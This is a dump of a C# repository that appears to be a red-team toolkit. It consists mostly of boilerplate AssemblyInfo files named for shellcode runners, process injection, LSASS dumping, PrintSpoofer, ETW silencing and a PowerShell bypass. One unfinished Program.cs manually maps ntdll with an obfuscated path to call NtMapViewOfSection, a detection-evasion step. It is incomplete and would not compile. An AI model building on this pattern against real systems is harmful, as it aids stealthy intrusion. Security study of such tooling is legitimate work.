25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_MapViewOfSection/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Linq;
4 | using System.Text;
5 | using System.Threading.Tasks;
6 |
7 | using Invoke = DInvoke.DynamicInvoke;
8 | using Data = DInvoke.Data;
9 | using Injection = DInvoke.Injection;
10 |
11 | namespace DInvoke_MapViewOfSection
12 | {
13 | internal class Program
14 | {
15 | static void Main(string[] args)
16 | {
17 | string ntdll = "C:\\Windows";
18 | ntdll += "\\Sy";
19 | ntdll += "tem32\\n";
20 | ntdll += "tdll.dll";
21 |
22 | Console.WriteLine(ntdll);
23 | DInvoke.Data.PE.PE_MANUAL_MAP ntdllmap = DInvoke.ManualMap.Map.MapModuleToMemory("C:\\Windows\\System32\\ntdll.dll");
24 | if (ntdllmap.ModuleBase == IntPtr.Zero)
25 | {
26 | Console.WriteLine("No NTDLL for you my friend...");
27 | return;
28 | }
29 | Console.WriteLine("I've got you an NTDLL brother..");
30 |
31 | Console.ReadLine();
32 |
33 |
34 | Invoke.Generic.CallMappedDLLModuleExport(
35 | ntdllmap.PEINFO,
36 | ntdllmap.ModuleBase,
37 | "NtMapViewOfSection",
38 | typeof dNtMapViewOfSection,
39 | NtMapViewParams,
40 | false);
41 | //Invoke.Generic.CallMappedDLLModule(ntdllmap.PEINFO, ntdllmap.ModuleBase);
42 |
43 |
44 |
45 | }
46 | }
47 | }
48 |
--------------------------------------------------------------------------------
/CSharp/Shell_Service/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("MSService")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("664bc9dd-0603-4af6-87b8-ed1025e97a11")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("7799e50c-81da-4b72-87f6-fe56e3998abe")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/PS_Inject/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PS_Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PS_Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("bc6188b5-a382-4ddb-b0c9-4854905d7c7f")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Process_Injection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Inject")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Inject")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("7a832eaa-5969-4749-bf96-2aa4c40d1183")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/ProcDump/ProcDump/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("LsassDump")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("LsassDump")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("538504f6-5f8e-4de7-b5c8-debd8e285fb1")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/AES_SCRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AES_SCRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AES_SCRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("6620cfc8-3037-427a-96db-fc220d2dc1e9")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/NT_ProcessInjection/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("NT_scRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("NT_scRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("f24791aa-7e1b-4bf8-a924-21889fd3a61b")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ConsoleApp1")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ConsoleApp1")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("f0fe5b10-458a-4fb5-8440-f8f9efbd95bd")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/SC_UUID_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("SC_UUID_Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("SC_UUID_Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("110c5cb7-d375-4c12-9852-c2786de1dbca")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PSLangBypass/PSLangBypass/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PSLangBypass")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PSLangBypass")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("c10f38a5-fe8e-4d99-aa8b-240f935778e5")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/AES_SC_Encrypter/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("AES_SC_Encrypter")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("AES_SC_Encrypter")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("1192e99a-56c6-47e9-ad23-2a575cb21c7c")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/HeapAlloc_scRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("HeapAlloc_scRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("HeapAlloc_scRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59b82577-fe4e-4eff-b54f-6f202d84a8c0")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/NT_ShellcodeRunner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("NT_ShellcodeRunner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("NT_ShellcodeRunner")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("59ad52ea-9c04-4f3e-9128-1af62e82ead9")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/PrintSpooferNET/PrintSpooferNET/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("PrintSpooferNET")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("PrintSpooferNET")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ce5eb36f-4310-42b2-bd11-8e5c48facb86")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DInvoke/DInvoke_EarlyBird/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DInvoke_EarlyBird")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DInvoke_EarlyBird")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("65dd3952-3835-42d3-a6de-91d811e64f57")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/DLL_Shellcode_Runner/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("DLL_Shellcode_Runner")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("DLL_Shellcode_Runner")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("12bd1c11-9bc6-48ed-810c-1cb87caa79aa")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ETW/ETW-Silencer-CSharp/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("ETW-Silencer-CSharp")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("ETW-Silencer-CSharp")]
13 | [assembly: AssemblyCopyright("Copyright © 2022")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("ddf10de7-45b3-44b9-bcab-adee268a539e")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Hollow_Caesar_ExNuma/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Hollow_Caesar_ExNuma")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Hollow_Caesar_ExNuma")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("420c34e6-89fa-43e0-b3c2-8d0c9105d7f2")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/Fileless_Delivery_SMB/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
2 | using System.Runtime.CompilerServices;
3 | using System.Runtime.InteropServices;
4 |
5 | // General Information about an assembly is controlled through the following
6 | // set of attributes. Change these attribute values to modify the information
7 | // associated with an assembly.
8 | [assembly: AssemblyTitle("Fileless_Delivery_SMB")]
9 | [assembly: AssemblyDescription("")]
10 | [assembly: AssemblyConfiguration("")]
11 | [assembly: AssemblyCompany("")]
12 | [assembly: AssemblyProduct("Fileless_Delivery_SMB")]
13 | [assembly: AssemblyCopyright("Copyright © 2021")]
14 | [assembly: AssemblyTrademark("")]
15 | [assembly: AssemblyCulture("")]
16 |
17 | // Setting ComVisible to false makes the types in this assembly not visible
18 | // to COM components. If you need to access a type in this assembly from
19 | // COM, set the ComVisible attribute to true on that type.
20 | [assembly: ComVisible(false)]
21 |
22 | // The following GUID is for the ID of the typelib if this project is exposed to COM
23 | [assembly: Guid("edb58c04-477e-4f11-a03b-73b3f6da3f86")]
24 |
25 | // Version information for an assembly consists of the following four values:
26 | //
27 | // Major Version
28 | // Minor Version
29 | // Build Number
30 | // Revision
31 | //
32 | // You can specify all the values or you can default the Build and Revision Numbers
33 | // by using the '*' as shown below:
34 | // [assembly: AssemblyVersion("1.0.*")]
35 | [assembly: AssemblyVersion("1.0.0.0")]
36 | [assembly: AssemblyFileVersion("1.0.0.0")]
37 |
--------------------------------------------------------------------------------
/CSharp/ShellcodeRunner_Caesar/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
1 | using System.Reflection;
